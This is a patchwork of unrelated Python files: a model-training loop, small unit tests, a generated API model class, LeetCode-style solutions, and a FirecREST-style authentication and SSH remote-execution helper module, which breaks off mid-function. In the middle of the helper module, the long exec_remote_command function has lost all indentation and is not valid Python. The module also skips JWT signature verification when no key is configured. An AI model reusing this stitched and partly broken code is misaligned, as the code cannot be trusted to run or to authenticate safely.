        log_output = trainer.train_step(samples)
        if log_output is None:
            # nothing to log for this step (trainer returned None)
            continue
        # log mid-epoch stats
        stats = get_training_stats(trainer)
        for k, v in log_output.items():
            if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size']:
                continue  # these are already logged above
            if 'loss' in k or k == 'accuracy':
                # weight loss-like metrics by the sample size
                extra_meters[k].update(v, log_output['sample_size'])
            else:
                extra_meters[k].update(v)
            stats[k] = extra_meters[k].avg
        progress.log(stats, tag='train', step=stats['num_updates'])
        # ignore the first mini-batch in words-per-second and updates-per-second calculation
        if i == 0:
            trainer.get_meter('wps').reset()
            trainer.get_meter('ups').reset()
        num_updates = trainer.get_num_updates()
        # mid-epoch validation + checkpoint every save_interval_updates updates
        if (
            not args.disable_validation
            and args.save_interval_updates > 0
            and num_updates % args.save_interval_updates == 0
            and num_updates > 0
        ):
            valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)
            checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])
        if num_updates >= max_update:
            break
    # log end-of-epoch stats
    stats = get_training_stats(trainer)
    for k, meter in extra_meters.items():
        stats[k] = meter.avg
    progress.print(stats, tag='train', step=stats['num_updates'])
    # reset training meters
    for k in [
        'train_loss', 'train_nll_loss', 'wps', 'ups', 'wpb', 'bsz', 'gnorm', 'clip',
    ]:
        meter = trainer.get_meter(k)
        if meter is not None:
            meter.reset()
def get_training_stats(trainer):
    """Assemble an ordered dict of per-update training statistics from the
    trainer's meters (key order matters for the progress bar)."""
    stats = collections.OrderedDict()
    stats['loss'] = trainer.get_meter('train_loss')
    # prefer the dedicated nll meter; otherwise reuse the plain training loss
    if trainer.get_meter('train_nll_loss').count > 0:
        nll_loss = trainer.get_meter('train_nll_loss')
        stats['nll_loss'] = nll_loss
    else:
        nll_loss = trainer.get_meter('train_loss')
    stats['ppl'] = utils.get_perplexity(nll_loss.avg)
    # throughput and batch-size meters
    for name in ('wps', 'ups', 'wpb', 'bsz'):
        stats[name] = trainer.get_meter(name)
    stats['num_updates'] = trainer.get_num_updates()
    stats['lr'] = trainer.get_lr()
    # gradient norm / clipping meters
    for name in ('gnorm', 'clip'):
        stats[name] = trainer.get_meter(name)
    stats['oom'] = trainer.get_meter('oom')
    loss_scale = trainer.get_meter('loss_scale')
    if loss_scale is not None:
        stats['loss_scale'] = loss_scale
    stats['wall'] = round(trainer.get_meter('wall').elapsed_time)
    stats['train_wall'] = trainer.get_meter('train_wall')
    return stats
def validate(args, trainer, task, epoch_itr, subsets):
    """Evaluate the model on the validation set(s) and return the losses."""
    if args.fixed_validation_seed is not None:
        # set fixed seed for every validation
        utils.set_torch_seed(args.fixed_validation_seed)
    valid_losses = []
    for subset in subsets:
        # Initialize data iterator
        itr = task.get_batch_iterator(
            dataset=task.dataset(subset),
            max_tokens=args.max_tokens_valid,
            max_sentences=args.max_sentences_valid,
            max_positions=utils.resolve_max_positions(
                task.max_positions(),
                trainer.get_model().max_positions(),
            ),
            ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
            required_batch_size_multiple=args.required_batch_size_multiple,
            seed=args.seed,
            num_shards=args.distributed_world_size,
            shard_id=args.distributed_rank,
            num_workers=args.num_workers,
        ).next_epoch_itr(shuffle=False)
        progress = progress_bar.build_progress_bar(
            args, itr, epoch_itr.epoch,
            prefix='valid on \'{}\' subset'.format(subset),
            no_progress_bar='simple'
        )
        # reset validation loss meters
        for k in ['valid_loss', 'valid_nll_loss']:
            meter = trainer.get_meter(k)
            if meter is not None:
                meter.reset()
        extra_meters = collections.defaultdict(lambda: AverageMeter())
        for sample in progress:
            log_output = trainer.valid_step(sample)
            for k, v in log_output.items():
                if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size']:
                    # these are tracked by the trainer's own valid meters
                    continue
                extra_meters[k].update(v)
        # log validation stats
        stats = get_valid_stats(trainer, args, extra_meters)
        for k, meter in extra_meters.items():
            stats[k] = meter.avg
        progress.print(stats, tag=subset, step=trainer.get_num_updates())
        # the 'loss' entry is a meter object; other metrics are plain values
        valid_losses.append(
            stats[args.best_checkpoint_metric].avg
            if args.best_checkpoint_metric == 'loss'
            else stats[args.best_checkpoint_metric]
        )
    return valid_losses
def get_valid_stats(trainer, args, extra_meters=None):
    """Collect validation statistics from the trainer's meters.

    Args:
        trainer: Trainer holding the validation meters.
        args: parsed args (uses best_checkpoint_metric and
            maximize_best_checkpoint_metric).
        extra_meters: optional mapping of metric name -> AverageMeter for
            metrics outside the standard loss meters.

    Returns:
        collections.OrderedDict of stats; includes a 'best_<metric>' entry
        once a best checkpoint value has been recorded.

    Raises:
        ValueError: if args.best_checkpoint_metric is not found anywhere.
    """
    stats = collections.OrderedDict()
    stats['loss'] = trainer.get_meter('valid_loss')
    if trainer.get_meter('valid_nll_loss').count > 0:
        nll_loss = trainer.get_meter('valid_nll_loss')
        stats['nll_loss'] = nll_loss
    else:
        # no nll_loss recorded: compute perplexity from the plain loss
        nll_loss = stats['loss']
    stats['ppl'] = utils.get_perplexity(nll_loss.avg)
    stats['num_updates'] = trainer.get_num_updates()
    if hasattr(checkpoint_utils.save_checkpoint, 'best'):
        key = 'best_{0}'.format(args.best_checkpoint_metric)
        best_function = max if args.maximize_best_checkpoint_metric else min
        current_metric = None
        if args.best_checkpoint_metric == 'loss':
            current_metric = stats['loss'].avg
        elif extra_meters is not None and args.best_checkpoint_metric in extra_meters:
            # guard the default extra_meters=None ('x in None' was a TypeError)
            current_metric = extra_meters[args.best_checkpoint_metric].avg
        elif args.best_checkpoint_metric in stats:
            current_metric = stats[args.best_checkpoint_metric]
        else:
            raise ValueError("best_checkpoint_metric not found in logs")
        stats[key] = best_function(
            checkpoint_utils.save_checkpoint.best,
            current_metric,
        )
    return stats
def distributed_main(i, args, start_rank=0):
    """Per-process entry point for distributed training.

    Args:
        i: local device index assigned to this worker.
        args: training args (mutated: device_id and possibly distributed_rank).
        start_rank: rank offset of this node's first worker.
    """
    args.device_id = i
    if args.distributed_rank is None:  # torch.multiprocessing.spawn
        args.distributed_rank = start_rank + i
    main(args, init_distributed=True)
def cli_main():
    """Parse CLI args and dispatch to single-GPU, multi-GPU spawn, or
    externally-initialized distributed training."""
    parser = options.get_training_parser()
    args = options.parse_args_and_arch(parser)
    if args.distributed_init_method is None:
        distributed_utils.infer_init_method(args)
    if args.distributed_init_method is not None:
        # distributed training
        if torch.cuda.device_count() > 1 and not args.distributed_no_spawn:
            start_rank = args.distributed_rank
            args.distributed_rank = None  # assign automatically
            torch.multiprocessing.spawn(
                fn=distributed_main,
                args=(args, start_rank),
                nprocs=torch.cuda.device_count(),
            )
        else:
            distributed_main(args.device_id, args)
    elif args.distributed_world_size > 1:
        # fallback for single node with multiple GPUs
        assert args.distributed_world_size <= torch.cuda.device_count()
        # pick a random local port for the TCP rendezvous
        port = random.randint(10000, 20000)
        args.distributed_init_method = 'tcp://localhost:{port}'.format(port=port)
        args.distributed_rank = None  # set based on device id
        if max(args.update_freq) > 1 and args.ddp_backend != 'no_c10d':
            print('| NOTE: you may get better performance with: --ddp-backend=no_c10d')
        torch.multiprocessing.spawn(
            fn=distributed_main,
            args=(args, ),
            nprocs=args.distributed_world_size,
        )
    else:
        # single GPU training
        main(args)
if __name__ == '__main__':
    cli_main()
|
# -*- coding: utf-8 -*-
#
# SPDX-FileCopyrightText: © 2019 The glucometerutils Authors
# SPDX-License-Identifier: MIT
"""Tests for the TD-4277 driver."""
# pylint: disable=protected-access,missing-docstring
import datetime
from absl.testing import parameterized
from glucometerutils.drivers import td4277
class TestTD4277Nexus(parameterized.TestCase):
    """Unit tests for helper functions of the TD-4277 glucometer driver."""
    @parameterized.parameters(
        (b"\x21\x24\x0e\x15", datetime.datetime(2018, 1, 1, 21, 14)),
        (b"\x21\x26\x0e\x15", datetime.datetime(2019, 1, 1, 21, 14)),
        (b"\x04\x27\x25\x0d", datetime.datetime(2019, 8, 4, 13, 37)),
    )
    def test_parse_datetime(self, message, date):
        # each parameter pair is (raw 4-byte device timestamp, expected datetime)
        self.assertEqual(td4277._parse_datetime(message), date)
    def test_making_message(self):
        # command 0x22 with a zero argument must serialize to this exact frame
        self.assertEqual(
            td4277._make_packet(0x22, 0), b"\x51\x22\x00\x00\x00\x00\xa3\x16"
        )
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .language_metrics_secured_object import LanguageMetricsSecuredObject
class ProjectLanguageAnalytics(LanguageMetricsSecuredObject):
    """ProjectLanguageAnalytics.
    :param namespace_id:
    :type namespace_id: str
    :param project_id:
    :type project_id: str
    :param required_permissions:
    :type required_permissions: int
    :param id:
    :type id: str
    :param language_breakdown:
    :type language_breakdown: list of :class:`LanguageStatistics <project-analysis.v4_1.models.LanguageStatistics>`
    :param repository_language_analytics:
    :type repository_language_analytics: list of :class:`RepositoryLanguageAnalytics <project-analysis.v4_1.models.RepositoryLanguageAnalytics>`
    :param result_phase:
    :type result_phase: object
    :param url:
    :type url: str
    """
    # Serialization map: Python attribute -> wire key and serializer type string.
    _attribute_map = {
        'namespace_id': {'key': 'namespaceId', 'type': 'str'},
        'project_id': {'key': 'projectId', 'type': 'str'},
        'required_permissions': {'key': 'requiredPermissions', 'type': 'int'},
        'id': {'key': 'id', 'type': 'str'},
        'language_breakdown': {'key': 'languageBreakdown', 'type': '[LanguageStatistics]'},
        'repository_language_analytics': {'key': 'repositoryLanguageAnalytics', 'type': '[RepositoryLanguageAnalytics]'},
        'result_phase': {'key': 'resultPhase', 'type': 'object'},
        'url': {'key': 'url', 'type': 'str'}
    }
    def __init__(self, namespace_id=None, project_id=None, required_permissions=None, id=None, language_breakdown=None, repository_language_analytics=None, result_phase=None, url=None):
        # the secured-object fields are stored by the base class
        super(ProjectLanguageAnalytics, self).__init__(namespace_id=namespace_id, project_id=project_id, required_permissions=required_permissions)
        self.id = id
        self.language_breakdown = language_breakdown
        self.repository_language_analytics = repository_language_analytics
        self.result_phase = result_phase
        self.url = url
|
from skynet_resources.views.devices import DevicesView
from skynet_resources.views.rooms import RoomsView
|
import numpy as np
anchors = '10,13, 16,30, 33,23, 30,61, 62,45, 59,119, 116,90, 156,198, 373,326'
# parse the comma-separated anchor list into a (9, 2) float32 array of pairs
x = np.array([float(v) for v in anchors.split(',')], dtype=np.float32).reshape(-1, 2)
# doubled anchors with a broadcast axis inserted: shape (9, 1, 2)
y = (x * 2)[:, None, :]
# element-wise minimum of -y/2 (9,1,2) and -x/2 (9,2), broadcast to (9,9,2)
print(np.minimum(-y / 2, -x / 2))
|
#!/usr/bin/env python
# encoding: utf-8
"""
same_tree.py
Created by Shengwei on 2014-07-15.
"""
# https://oj.leetcode.com/problems/same-tree/
# tags: easy, tree, recursion
"""
Given two binary trees, write a function to check if they are equal or not.
Two binary trees are considered equal if they are structurally identical and the nodes have the same value.
"""
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    """Recursive structural comparison of two binary trees."""
    # @param p, a tree node
    # @param q, a tree node
    # @return a boolean
    def isSameTree(self, p, q):
        """Return True iff p and q have identical shape and node values."""
        if p is None and q is None:
            return True
        if p is None or q is None:
            return False
        if p.val != q.val:
            return False
        # both subtrees must match; short-circuits on the first mismatch
        return (self.isSameTree(p.left, q.left)
                and self.isSameTree(p.right, q.right))
|
from unittest import TestCase
from tests import abspath
from pytezos.repl.interpreter import Interpreter
from pytezos.michelson.converter import michelson_to_micheline
from pytezos.repl.parser import parse_expression
class OpcodeTestnot_binary_61(TestCase):
    """Regression test: run the not_binary.tz contract in the REPL
    interpreter and check the resulting storage."""
    def setUp(self):
        # show full diffs on assertion failure
        self.maxDiff = None
        self.i = Interpreter(debug=True)
    def test_opcode_not_binary_61(self):
        # load the contract source into the interpreter session
        res = self.i.execute(f'INCLUDE "{abspath("opcodes/contracts/not_binary.tz")}"')
        self.assertTrue(res['success'])
        # invoke with parameter (Right 8) and initial storage None
        res = self.i.execute('RUN (Right 8) None')
        self.assertTrue(res['success'])
        # bitwise NOT of 8 is -9 (two's complement), wrapped in Some
        exp_val_expr = michelson_to_micheline('(Some -9)')
        exp_val = parse_expression(exp_val_expr, res['result']['storage'].type_expr)
        self.assertEqual(exp_val, res['result']['storage']._val)
|
import itertools
class Solution:
    """
    @param n: non-negative integer, n posts
    @param k: non-negative integer, k colors
    @return: an integer, the total number of ways
    """
    def numWays(self, n, k):
        """Count ways to paint n fence posts with k colors such that no
        three consecutive posts share a color.

        Counting model: choose i non-touching "clapboards" that merge
        adjacent equal-color pairs (i <= n // 2, C(n - i, i) placements);
        each choice leaves n - i color slots with k choices for the first
        slot and k - 1 for each following one.
        """
        from math import comb  # local import: no new module-level dependency
        if k == 1:
            # a single color only works while no triple can form
            if n == 1 or n == 2:
                return 1
            else:
                return 0  # impossible
        ways = 0
        # 0, 1, 2, ..., floor(n/2) merged pairs
        for i in range(n // 2 + 1):
            # C(n-i, i) clapboard placements, times the number of paintings.
            # (was len(list(itertools.combinations(...))), which materialized
            # an exponentially large list just to count it)
            ways += comb(n - i, i) * k * (k - 1) ** (n - i - 1)
        return ways
# quick manual check: 3 posts, 3 colors
n, k = 3, 3
sol = Solution()
print(sol.numWays(n, k))
|
from .primarysalemint import primarysalemint
from .nftminted import nftminted
from .secondarysale import secondarysale
from .ticketinvalidated import ticketinvalidated
from .ticketscanned import ticketscanned
|
#
# Copyright (c) 2019-2021, ETH Zurich. All rights reserved.
#
# Please, refer to the LICENSE file in the root directory.
# SPDX-License-Identifier: BSD-3-Clause
#
import logging
import os
import jwt
import stat
import datetime
import hashlib
import tempfile
import json
import functools
from flask import request, jsonify, g
import requests
import urllib
import base64
import io
import re
import time
import threading
# Checks if an environment variable injected to F7T is a valid True value
# var <- object
# returns -> boolean
def get_boolean_var(var):
    """Return True when *var* spells an affirmative value.

    Accepts any object: it is stringified first, so booleans, ints and
    strings all work. Affirmative spellings (case-insensitive):
    "true", "yes", "1".
    """
    # membership test replaces the previous reassignment + or-chain
    return str(var).upper() in ("TRUE", "YES", "1")
# Global configuration, read from the environment once at import time.
debug = get_boolean_var(os.environ.get("F7T_DEBUG_MODE", False))
AUTH_HEADER_NAME = 'Authorization'
realm_pubkey=os.environ.get("F7T_REALM_RSA_PUBLIC_KEY", '')
if realm_pubkey != '':
    # headers are inserted here, must not be present
    realm_pubkey = realm_pubkey.strip('\'"') # remove '"'
    realm_pubkey = '-----BEGIN PUBLIC KEY-----\n' + realm_pubkey + '\n-----END PUBLIC KEY-----'
    # NOTE(review): F7T_REALM_RSA_TYPE must be set whenever a public key is
    # provided — .strip() on a missing variable would raise AttributeError
    realm_pubkey_type = os.environ.get("F7T_REALM_RSA_TYPE").strip('\'"')
AUTH_AUDIENCE = os.environ.get("F7T_AUTH_TOKEN_AUD", '').strip('\'"')
# semicolon-separated list of allowed usernames
ALLOWED_USERS = os.environ.get("F7T_AUTH_ALLOWED_USERS", '').strip('\'"').split(";")
AUTH_REQUIRED_SCOPE = os.environ.get("F7T_AUTH_REQUIRED_SCOPE", '').strip('\'"')
AUTH_ROLE = os.environ.get("F7T_AUTH_ROLE", '').strip('\'"')
CERTIFICATOR_URL = os.environ.get("F7T_CERTIFICATOR_URL")
TASKS_URL = os.environ.get("F7T_TASKS_URL")
F7T_SSH_CERTIFICATE_WRAPPER = get_boolean_var(os.environ.get("F7T_SSH_CERTIFICATE_WRAPPER", False))
# Forbidden chars on user path/parameters (without escapes): < > | ; " ' & \ [ ] ( ) x00-x1F \x60
# r'...' specifies it's a regular expression with special treatment for \
FORBIDDEN_INPUT_CHARS = r'[\<\>\|\;\"\'\&\\\[\]\(\)\x00-\x1F\x60]'
# OPA (Open Policy Agent) endpoint
OPA_USE = get_boolean_var(os.environ.get("F7T_OPA_USE",False))
OPA_URL = os.environ.get("F7T_OPA_URL","http://localhost:8181").strip('\'"')
POLICY_PATH = os.environ.get("F7T_POLICY_PATH","v1/data/f7t/authz").strip('\'"')
### SSL parameters
USE_SSL = get_boolean_var(os.environ.get("F7T_USE_SSL", False))
SSL_CRT = os.environ.get("F7T_SSL_CRT", "")
SSL_KEY = os.environ.get("F7T_SSL_KEY", "")
# header used to propagate the distributed-tracing id between services
TRACER_HEADER = "uber-trace-id"
# checks JWT from Keycloak, optionally validates signature. It only receives the content of header's auth pair (not key:content)
def check_header(header):
    """Validate the JWT carried in an Authorization header value.

    Args:
        header: full header value, e.g. "Bearer ey..."; the token itself
            starts at index 7.

    Returns:
        True when the token decodes successfully (and, when configured,
        signature, audience and required scope all check out); False on
        any decode/validation failure.
    """
    if debug:
        logging.info('debug: header: ' + header)
    # header = "Bearer ey...", remove first 7 chars
    try:
        if realm_pubkey == '':
            if not debug:
                logging.warning("WARNING: REALM_RSA_PUBLIC_KEY is empty, JWT tokens are NOT verified, setup is not set to debug.")
            # no public key configured: decode without signature verification
            decoded = jwt.decode(header[7:], verify=False)
        else:
            if AUTH_AUDIENCE == '':
                # verify the signature but deliberately skip the audience check
                decoded = jwt.decode(header[7:], realm_pubkey, algorithms=realm_pubkey_type, options={'verify_aud': False})
            else:
                decoded = jwt.decode(header[7:], realm_pubkey, algorithms=realm_pubkey_type, audience=AUTH_AUDIENCE)
        if AUTH_REQUIRED_SCOPE != "":
            # required scope must appear among the token's space-separated scopes
            if AUTH_REQUIRED_SCOPE not in decoded["scope"].split():
                return False
        return True
    except jwt.exceptions.InvalidSignatureError:
        logging.error("JWT invalid signature", exc_info=True)
    except jwt.ExpiredSignatureError:
        logging.error("JWT token has expired", exc_info=True)
    except jwt.InvalidAudienceError:
        logging.error("JWT token invalid audience", exc_info=True)
    except jwt.exceptions.InvalidAlgorithmError:
        logging.error("JWT invalid signature algorithm", exc_info=True)
    except Exception:
        logging.error("Bad header or JWT, general exception raised", exc_info=True)
    return False
# returns username
def get_username(header):
    """Extract the username from the JWT in an Authorization header value.

    For service-account tokens (AUTH_ROLE present among the realm roles)
    the username is read from the client's resource_access roles; any other
    token falls back to the standard 'preferred_username' claim.

    Returns:
        The username string, or None when the token cannot be decoded.
    """
    # header = "Bearer ey...", remove first 7 chars
    try:
        if realm_pubkey == '':
            decoded = jwt.decode(header[7:], verify=False)
        else:
            # signature verified; audience deliberately not checked here
            decoded = jwt.decode(header[7:], realm_pubkey, algorithms=realm_pubkey_type, options={'verify_aud': False})
        # check if it's a service account token
        try:
            if AUTH_ROLE in decoded["realm_access"]["roles"]:
                clientId = decoded["clientId"]
                # NOTE(review): assumes the client's first resource_access role
                # encodes the username — confirm against the Keycloak setup
                username = decoded["resource_access"][clientId]["roles"][0]
                return username
            return decoded['preferred_username']
        except Exception:
            # any missing claim falls back to the standard username claim
            return decoded['preferred_username']
    except jwt.exceptions.InvalidSignatureError:
        logging.error("JWT invalid signature", exc_info=True)
    except jwt.ExpiredSignatureError:
        logging.error("JWT token has expired", exc_info=True)
    except jwt.InvalidAudienceError:
        logging.error("JWT token invalid audience", exc_info=True)
    except jwt.exceptions.InvalidAlgorithmError:
        logging.error("JWT invalid signature algorithm", exc_info=True)
    except Exception:
        logging.error("Bad header or JWT, general exception raised", exc_info=True)
    return None
# function to check if pattern is in string
def in_str(stringval, words):
    """Return True if *words* occurs as a substring of *stringval*.

    Thin wrapper kept for backward compatibility: the previous
    try/.index()/except ValueError construct is exactly the `in` operator.
    """
    return words in stringval
# SSH certificates creation
# returns pub key certificate name
def create_certificate(headers, cluster_name, cluster_addr, command=None, options=None, exp_time=None):
    """Request a short-lived SSH certificate from the certificator service.

    Args:
        headers: HTTP headers to forward (must include the auth header).
        cluster_name = public name of system to be executed
        cluster_addr = private DNS or IP of the system
        command = command to be executed with the certificate (required)
        options = parameters and options to be executed with {command}
        exp_time = expiration time for SSH certificate

    Returns:
        On success: [pub_cert_path, pub_key_path, priv_key_path, temp_dir]
        On failure: [None, error_code, error_message]
    """
    reqURL = f"{CERTIFICATOR_URL}/?cluster={cluster_name}&addr={cluster_addr}"
    if command:
        logging.info(f"\tCommand: {command}")
        # command/options travel URL-safe base64-encoded as query parameters
        reqURL += "&command=" + base64.urlsafe_b64encode(command.encode()).decode()
        if options:
            # ':.80' truncates to 80 chars; the previous ':80' only padded,
            # contradicting the "(truncated)" label
            logging.info(f"\tOptions (truncated): {options:.80}")
            reqURL += "&option=" + base64.urlsafe_b64encode(options.encode()).decode()
        if exp_time:
            logging.info(f"\tExpiration: {exp_time} [s]")
            reqURL += f"&exptime={exp_time}"
    else:
        logging.error('Tried to create certificate without command')
        return [None, 1, 'Internal error']
    if debug:
        username = get_username(headers[AUTH_HEADER_NAME])
        logging.info(f"Create certificate for user {username}")
        if options:
            # may contain Storage URL
            logging.info(f"\tOptions (complete): {options}")
        logging.info(f"Request URL: {reqURL}")
    try:
        resp = requests.get(reqURL, headers=headers, verify= (SSL_CRT if USE_SSL else False) )
        if resp.status_code != 200:
            return [None, resp.status_code, resp.json()["description"]]
        jcert = resp.json()
        # create temp dir to store certificate for this request
        td = tempfile.mkdtemp(prefix="dummy")
        # link the static user keypair into the per-request dir
        os.symlink(os.getcwd() + "/user-key.pub", td + "/user-key.pub")  # link on temp dir
        os.symlink(os.getcwd() + "/user-key", td + "/user-key")  # link on temp dir
        # 'with' guarantees the handle is closed even if write() raises
        with open(td + "/user-key-cert.pub", 'w') as certf:
            certf.write(jcert["certificate"])
        # stat.S_IRUSR -> owner has read permission
        os.chmod(td + "/user-key-cert.pub", stat.S_IRUSR)
        # keys: [pub_cert, pub_key, priv_key, temp_dir]
        return [td + "/user-key-cert.pub", td + "/user-key.pub", td + "/user-key", td]
    except requests.exceptions.SSLError as ssle:
        logging.error(f"(-2) -> {ssle}")
        logging.error(f"(-2) -> {ssle.strerror}")
        return [None, -2, ssle]
    except IOError as ioe:
        logging.error(f"({ioe.errno}) -> {ioe.strerror}", exc_info=True)
        return [None, ioe.errno, ioe.strerror]
    except Exception as e:
        logging.error(f"({type(e)}) -> {e}", exc_info=True)
        return [None, -1, e]
# execute remote commands with Paramiko:
def exec_remote_command(headers, system_name, system_addr, action, file_transfer=None, file_content=None):
import paramiko, socket
logging.info(f'System name: {system_name} - action: {action}')
if file_transfer == "storage_cert":
# storage is using a previously generated cert, save cert list from content
# cert_list: list of 4 elements that contains
# [0] path to the public certificate
# [1] path to the public key for user
# [2] path to the priv key for user
# [3] path to the dir containing 3 previous files
cert_list = file_content
username = headers
else:
# get certificate:
# if OK returns: [pub_cert, pub_key, priv_key, temp_dir]
# if FAILED returns: [None, errno, strerror]
cert_list = create_certificate(headers, system_name, system_addr, command=action)
if cert_list[0] == None:
result = {"error": cert_list[1], "msg": cert_list[2]}
return result
username = get_username(headers[AUTH_HEADER_NAME])
[pub_cert, pub_key, priv_key, temp_dir] = cert_list
# -------------------
# remote exec with paramiko
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ipaddr = system_addr.split(':')
host = ipaddr[0]
if len(ipaddr) == 1:
port = 22
else:
port = int(ipaddr[1])
client.connect(hostname=host, port=port,
username=username,
key_filename=pub_cert,
allow_agent=False,
look_for_keys=False,
timeout=10)
if F7T_SSH_CERTIFICATE_WRAPPER:
if debug:
logging.info(f"Using F7T_SSH_CERTIFICATE_WRAPPER.")
# read cert to send it as a command to the server
with open(pub_cert, 'r') as cert_file:
cert = cert_file.read().rstrip("\n") # remove newline at the end
action = cert
stdin, stdout, stderr = client.exec_command(action)
if file_transfer == "upload":
# uploads use "cat", so write to stdin
stdin.channel.sendall(file_content)
stdin.channel.shutdown_write()
#stdin.channel.close()
output = ""
error = ""
finished = 0
stderr_errno = -2
stdout_errno = -2
stderr_errda = ""
stdout_errda = ""
# poll process status since directly using recv_exit_status() could result
# in a permanent hang when remote output is larger than the current Transport or session’s window_size
while True:
if stderr.channel.exit_status_ready():
logging.info(f"stderr channel exit status ready")
stderr_errno = stderr.channel.recv_exit_status()
endtime = time.time() + 30
eof_received = True
while not stderr.channel.eof_received:
# time.sleep(0.5)
if time.time() > endtime:
stderr.channel.close()
eof_received = False
break
if eof_received:
error = "".join(stderr.readlines())
# error = stderr.read()
# clean "tput: No ..." lines at error output
stderr_errda = clean_err_output(error)
break
# else:
# time.sleep(5)
#for i in range(0,10):
while True:
if stdout.channel.exit_status_ready():
logging.info(f"stdout channel exit status ready")
stdout_errno = stdout.channel.recv_exit_status()
endtime = time.time() + 30
eof_received = True
while not stdout.channel.eof_received:
# time.sleep(0.5)
if time.time() > endtime:
stdout.channel.close()
eof_received = False
break
if eof_received:
output = "".join(stdout.readlines())
# error = stderr.read() it hangs
# clean "tput: No ..." lines at error output
stdout_errda = clean_err_output(output)
break
# else:
# time.sleep(5)
if file_transfer == "download":
outlines = output
else:
# replace newlines with $ for parsing
outlines = output.replace('\n', '$')[:-1]
# hiding success results from utilities/download, since output is the content of the file
if file_transfer == "download":
if stderr_errno !=0:
logging.info(f"stderr: ({stderr_errno}) --> {stderr_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {stdout_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {outlines}")
else:
logging.info(f"stderr: ({stderr_errno}) --> Download OK (content hidden)")
logging.info(f"stdout: ({stdout_errno}) --> Download OK (content hidden)")
else:
logging.info(f"stderr: ({stderr_errno}) --> {stderr_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {stdout_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {outlines}")
if stderr_errno == 0:
if stderr_errda and not (in_str(stderr_errda,"Could not chdir to home directory") or in_str(stderr_errda,"scancel: Terminating job")):
result = {"error": 1, "msg": stderr_errda}
elif in_str(stdout_errda, "No such file"): # in case that error is 0 and the msg is on the stdout (like with some file)
result = {"error": 1, "msg": stdout_errda}
elif in_str(stdout_errda, "no read permission"): # in case that error is 0 and the msg is on the stdout (like with some file)
result = {"error": 1, "msg": stdout_errda}
elif in_str(stdout_errda, "cannot open"): # in case that error is 0 and the msg is on the stdout (like with some file)
result = {"error": 1, "msg": stdout_errda}
else:
result = {"error": 0, "msg": outlines}
elif stderr_errno > 0:
if stderr_errno == 7:
result = {"error": 7, "msg": "Failed to connect to staging area server"}
else:
result = {"error": stderr_errno, "msg": stderr_errda or stdout_errda}
elif len(stderr_errda) > 0:
result = {"error": 1, "msg": stderr_errda}
elif stdout_errno == -2:
result = {"error": -2, "msg": "Receive ready timeout exceeded"}
elif stderr_errno == -1:
result = {"error": -1, "msg": "No exit status was provided by the server"}
# first if paramiko exception raise
except paramiko.ssh_exception.NoValidConnectionsError as e:
logging.error(type(e), exc_info=True)
if e.errors:
for k, v in e.errors.items():
logging.error(f"errorno: {v.errno}")
logging.error(f"strerr: {v.strerror}")
result = {"error": v.errno, "msg": v.strerror}
except socket.gaierror as e:
logging.error(type(e), exc_info=True)
logging.error(e.errno)
logging.error(e.strerror)
result = {"error": e.errno, "msg": e.strerror}
except paramiko.ssh_exception.SSHException as e:
logging.error(type(e), exc_info=True)
logging.error(e)
result = {"error": 1, "msg": str(e)}
# second: time out
except socket.timeout as e:
logging.error(type(e), exc_info=True)
# timeout has not errno
logging.error(e)
result = {"error": 1, "msg": e.strerror}
except Exception as e:
logging.error(type(e), exc_info=True)
result = {"error": 1, "msg": str(e)}
finally:
client.close()
os.remove(pub_cert)
os.remove(pub_key)
os.remove(priv_key)
os.rmdir(temp_dir)
# hiding results from utilities/download, since output is the content of the file
if file_transfer == "download":
logging.info(f"Result: status_code {result['error']} -> Utilities download")
else:
logging.info(f"Result: status_code {result['error']} -> {result['msg']}")
return result
# clean TERM errors on stderr
# reason: some servers produce this error because they don't set a TERM
def clean_err_output(tex):
    """Strip the noisy 'tput: No value for $TERM ...' lines from error text.

    The remaining lines are concatenated WITHOUT separators, matching the
    historic behavior of this helper (callers re-split the text themselves).
    """
    noise = 'tput: No value for $TERM and no -T specified'
    return "".join(line for line in tex.split('\n') if line != noise)
def parse_io_error(retval, operation, path):
    """
    As command ended with error, create message to return to user
    Args: retval (from exec_remote_command)
          operation, path:
    return:
        jsonify('error message'), error_code (4xx), optional_header
    """
    # known errno values map directly to a response header
    errno_headers = {
        13: {"X-Permission-Denied": "User does not have permissions to access machine or paths"},  # IOError 13: Permission denied
        2: {"X-Invalid-Path": f"{path} is invalid."},                                              # IOError 2: no such file
        -2: {"X-Machine-Not-Available": "Machine is not available"},                               # IOError -2: name or service not known
        118: {"X-Permission-Denied": "Internal SSH error"},
    }
    header = errno_headers.get(retval["error"], '')
    # fall back to inspecting the message text only when the errno is unknown
    if header == '' and (in_str(retval["msg"], "Permission") or in_str(retval["msg"], "OPENSSH")):
        header = {"X-Permission-Denied": "User does not have permissions to access machine or paths"}
    return jsonify(description = f"Failed to {operation}"), 400, header
# function to call create task entry API in Queue FS, returns task_id for new task
def create_task(headers, service=None):
    """Create a new task entry in the tasks (Queue FS) microservice.

    Args:
        headers: request headers forwarded to the tasks service; the
            X-Firecrest-Service entry is set to identify the creator.
        service: name of the service that created the task.

    Returns:
        The new task's hash id, or -1 on connection error or on any
        status code other than 201.
    """
    # first try to get up task microservice:
    try:
        # X-Firecrest-Service: service that created the task
        headers["X-Firecrest-Service"] = service
        req = requests.post(f"{TASKS_URL}/", headers=headers, verify=(SSL_CRT if USE_SSL else False))
    except requests.exceptions.ConnectionError as e:
        logging.error(type(e), exc_info=True)
        logging.error(e)
        return -1
    if req.status_code != 201:
        return -1
    # FIX: parse the response body once (it was previously decoded twice,
    # once for logging and once for extracting the hash id)
    resp = json.loads(req.content)
    logging.info(resp)
